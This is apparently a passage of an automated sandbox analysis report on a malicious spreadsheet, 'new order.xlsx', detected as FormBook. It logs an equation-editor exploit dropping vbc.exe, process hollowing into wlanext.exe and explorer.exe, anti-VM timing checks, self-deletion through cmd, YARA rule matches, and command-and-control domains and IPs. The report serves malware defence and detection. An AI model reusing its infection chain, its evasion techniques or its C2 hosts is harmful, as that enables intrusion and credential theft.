          Source: C:\Users\Public\vbc.exeCode function: 7_2_009563DB
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0092F3CF
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00932305
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00937353
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A37B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00965485
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00941489
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B443E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0096D47D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0094C5F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093351F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00976540
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00934680
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093E6C1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0097A634
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D2622
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009B579A
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C7BC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009657C3
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009CF8EE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0093C85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0095286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009D098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D1238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02032305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02037353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D63BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020563DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205D005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02033040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D2622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0207A634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02034680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203E6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020657C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0206D47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02065485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02041489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02076540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204C5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020E3A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02057B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020DCBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020BDBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203C85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CF8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020B5955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020D098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020329B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020469FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02062E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0204EE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02040F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0205DF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CCFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020A2FDC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02060D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0203CD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020CFDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DCB21
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C8C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000C2FB0
          Source: new order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0209F970 appears 84 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0202DF5C appears 119 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02073F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0207373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0099F970 appears 49 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00973F92 appears 76 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0097373B appears 150 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0092DF5C appears 74 times
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: bin[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/13@4/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$new order.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF6CC.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: new order.xlsxVirustotal: Detection: 30%
          Source: new order.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: new order.xlsxStatic file information: File size 1333760 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: new order.xlsxInitial sample: OLE indicators vbamacros = False
          Source: new order.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040D06C push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041C2C2 push FFFFFFF6h; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415324 push edi; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3C5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B47C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B412 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B41B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041576D push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415770 push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415F11 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415FD6 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C426E push esp; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C1596 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00846D4B push ecx; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_008C5F8B push cs; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000CD06C push ebp; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DC2C2 push FFFFFFF6h; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5324 push edi; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB41B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB412 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000DB47C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D576D push edx; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5770 push edx; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5F11 push cs; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_000D5FD6 push cs; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75944853561
          Source: initial sampleStatic PE information: section name: .text entropy: 7.75944853561
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: new order.xlsxStream path 'EncryptedPackage' entropy: 7.99890686533 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C85F4 second address: 00000000000C85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2352Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2580Thread sleep time: -56221s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2524Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 56221
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2217760556.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2217725190.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2211654384.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.compareionizers.com
          Source: C:\Windows\explorer.exeDomain query: www.thinking-diversity.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.globaltradeview.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: BE0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2231668260.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2211807817.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
